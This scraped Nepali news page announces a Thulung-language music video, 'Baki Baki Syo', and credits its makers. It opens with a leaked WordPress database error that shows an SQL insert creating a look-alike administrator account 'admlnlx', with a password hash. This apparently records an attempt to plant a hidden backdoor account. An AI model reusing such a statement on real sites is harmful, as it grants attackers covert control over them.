WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVtU/unxz4ulXl9JMYNpTs0GrfxjIU.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 15:33:40', '', 'admlnlx', 'admlnlx')

थुलुङ भाषाको ‘बकि बकि स्यो’को भिडियो सार्वजनिक – Gaule Khabar

थुलुङ भाषाको ‘बकि बकि स्यो’को भिडियो सार्वजनिक

थुलुङ भाषाको ‘बकि बकि स्यो’को भिडियो सार्वजनिक

काठमाण्डौ । थुलुङ भाषाको गीत ‘बकि बकि स्यो’को म्युजिक भिडियो सार्वजनिक भएको छ । शनिबार जनम थुलुङ अफिसियल युटुबबाट सार्वजनिक गरिएको हो ।

उदिम किराँतीको शब्द र जनम थुलुङको संगीतमा रहेको गीतमा संगीतकार जनम थुलुङको साथमा सरला राई, मकर राई र रन्जना राईको स्वर अहेको छ । थुलुङ भाषामा तयार पारिएको गीतबाट थुलुङहरुलाई आफ्नो भाषा संस्कृतिको जर्गेनामा लाग्न आग्रह गरिएको छ ।

म्युजिक भिडियोमा ममता थुलुङ राईले निर्देशन गरेका छन । खोटाङको महेश्वरी क्षेत्रमा छायांकन गरिएको उक्त म्युजिक भिडियोमा प्रवेश राईको छायाङकन र सम्पादन रहेको छ भने ममता थुलुङ राई र अनुप राईको फिचरिङ्ग गरेका छन ।

https://www.youtube.com/watch?v=qaQeWsTW0lE&feature=emb_logo

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका